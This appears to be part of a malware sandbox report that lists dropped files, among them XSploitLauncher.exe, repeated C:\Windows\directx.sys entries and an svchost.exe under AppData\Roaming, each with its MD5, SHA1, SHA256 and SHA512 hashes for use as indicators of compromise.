| MD5 | 87ce6d7b069cd87bdd151abd8ced7e7a |
| SHA1 | 94eeff064ad184c76595a36888f243e442331c3a |
| SHA256 | ffd3911eb4a41072c93bb76e4ba94920c200e191b0d3df867ad8774062e0b65d |
| SHA512 | 94643d82e4e60b50dda43347568eb6362a6003fca1496965a7eb7cbe1b2ed466b406e013901c816e7446f7f9f41aaf3ec6fff1b2bbc9fccaebfd4971f68ffb00 |
C:\Users\Admin\AppData\Local\Temp\Files\XSploitLauncher.exe
| MD5 | 4bd68436e78a4a0f7bb552e349ab418f |
| SHA1 | a1c4c57efd9b246d85a47c523b5e0436b8c24deb |
| SHA256 | a52f8f78ba063951c3e315c562df187b90c257a61585e4682821abf6cefec957 |
| SHA512 | 070ebca410b909d0e0ce4ba9a8119aa45de42e1c8cffc18916b070e2ad6012f40f1b0784c375e8100a987ce84e71e51da353444241f9301217f159681c3d1bbd |
C:\Windows\directx.sys
| MD5 | 72d63b174b3773ce77b634431845a972 |
| SHA1 | 62bced2f020f057056c81ea03ff1812c2bd94742 |
| SHA256 | ff6a52a81e791de64e67cf5515570ba49faf2c0406464f6012b4b52ef8f8e7f3 |
| SHA512 | 304a6c040a4a3073537b656967bd6ff21064498a5ec88441c51b2a77cd4172adb91db5346acee407db699be5b2c127ccef8643bbd59cfb8d26cc5d6a14ed1d98 |
C:\Windows\directx.sys
| MD5 | 32775a9411b219ca34dc17a53a1bbcdf |
| SHA1 | 085b6cc3b170eba52aba15733210f0bf6c08c87c |
| SHA256 | 89f5327c69733ae36ea7f95365bda7cb175fb38a62186faf7d6507040d48496f |
| SHA512 | 63081531a1009371574a1d0faa3351ce720f30d6f4588a589d055947a2522ca46565f7cdc91b279d7a6f183c18e9ea404636e0b49f622dc62640c0e5ea5f2095 |
C:\Users\Admin\AppData\Roaming\svchost.exe
| MD5 | 39476c74921658da58506252acd72f92 |
| SHA1 | 6b79e09a712dd56e8800ee191f18ead43ba7006a |
| SHA256 | 26cab4dad2281e9683c56570546a1940d257ddafcc706af85d60975a4dd2bb65 |
| SHA512 | 20b43bdd535e9fee2bfc988f83c4cdb72def36631d57a0444f2dccc3f03e1e450655d8eca5555e21b76588bb6228a45a6ee238cb23e8eeffddff618ea379dabd |
C:\Windows\directx.sys
| MD5 | 2565f7eba76dcf49918f8dbeea07d9d1 |
| SHA1 | bc04a7888ee83fb5896f5e70d63fdf1395133f81 |
| SHA256 | 939f7408f67db22361275c2ce47458ccafb6b7f7942abfc563d5d113a545fe31 |
| SHA512 | cd24dbee32529eb95302d92fe8c174ac978f51172a1b0fb9bf933e7cfbd47050dcfe2f19410858906ee73e193b2835aae5ce6ced2885d980322959ee6b1db8dc |
C:\Users\Admin\AppData\Local\Temp\Files\Ukodbcdcl.exe
| MD5 | 25ed0fce4a9df59b3ed88853db8206f3 |
| SHA1 | 4382f0adb2a94e8a4eccd6aa2d222842000b7895 |
| SHA256 | c5b32f1cdc2a48f1dd2b1623598c24a2635dc57fdab3b4328f1cb3b66f5079ba |
| SHA512 | 5a329229506e3f9feaefbe477699cc4b8510f949f4b1df0bf5b66ac892404a94fa5effef3d9acbdfa90bb6e494e5799fa721e14a29ec4e0f1e7b97719397939f |
C:\Windows\directx.sys
| MD5 | 6b9b9f45e1632060d475e787f583d7d5 |
| SHA1 | efb82ce05015771ece14c411db4095cc1c8c75a9 |
| SHA256 | 4beda534bf5d4da7763ba8fd127d15e48742aeee5402a2e0d48f59f960edf7cc |
| SHA512 | e165f4f36b590ee1aa782ed0157d9fc7ba8d84d5c528c194c8d195c0fed7b8be740cb6aed53ef7156840de36361b41f2da43a37a0c8832edae0c055e1a502a14 |
C:\Users\Admin\AppData\Local\Temp\Files\Operation6572.exe
| MD5 | 913bdfccaaed0a1ed80d2c52e5f5d7c3 |
| SHA1 | 9befba3d43ace45a777d2e936e1046e7a0fb634c |
| SHA256 | 93e66ad3eea5b3217d9a016cb96951ab2dd0ae3f3ef6c2782667abacaaa8018f |
| SHA512 | 1999d174e14b96ccb35dc8ffa2cc576aff9d01d9373654a2a0f78342735e8b637f605144f5c56e922dc5ee43afb82e62ab9f21e0ecfd33a1b8369344346f90e6 |
C:\Windows\directx.sys
| MD5 | e68569c4801699b3cb99d6099c1162ea |
| SHA1 | 209555eeb6b800970a225227e714a4659c7a4ec7 |
| SHA256 | fc013ca86b76569251e12ecdd3205e14ca2793eb4dfe116046a6c10abb2759c1 |
| SHA512 | b3d0da21f1ae519daa22abd3bc28c183de7531a991d53daf060693f819b64c2aaac0463871d0708658d7ac79c6b5608389c909312286b74c7c8290f7c26bb2aa |
C:\Windows\directx.sys
| MD5 | a051804a55e27000cf84a88614b7a591 |
| SHA1 | 54b245c1ab6e77755aacc7d8878b0a65fa24be3f |
| SHA256 | 9910f538a1d96eca1278b8ab1093f3b3805b873ce8267517e8e9c650ed48c716 |
| SHA512 | 11607d2379b7aa85c656b789ccf0b8c6d15adc735c16c16b4276eac73d08c1238367044ecd8abda0acec464319a4d6ac8cf21c6d10671f9bbf755da2e2f1039a |
C:\Windows\directx.sys
| MD5 | 8a23e6c5964ee5698ede762f68caa8f2 |
| SHA1 | 04aba5515e02d58c3e3b2f64d6f510b45ba249e5 |
| SHA256 | f6ebca18cffed9fad751fd0998a897b163f637b0095da8eb951de347533ddf91 |
| SHA512 | 25229e2524941f82f33c6b4d97fc809e6fd50bf0d715bbe60ecca579537d035ed32d67fa8d36c1b0f18a72d2cbac00ba1e70d962c3bf579d8d8119a90f70b600 |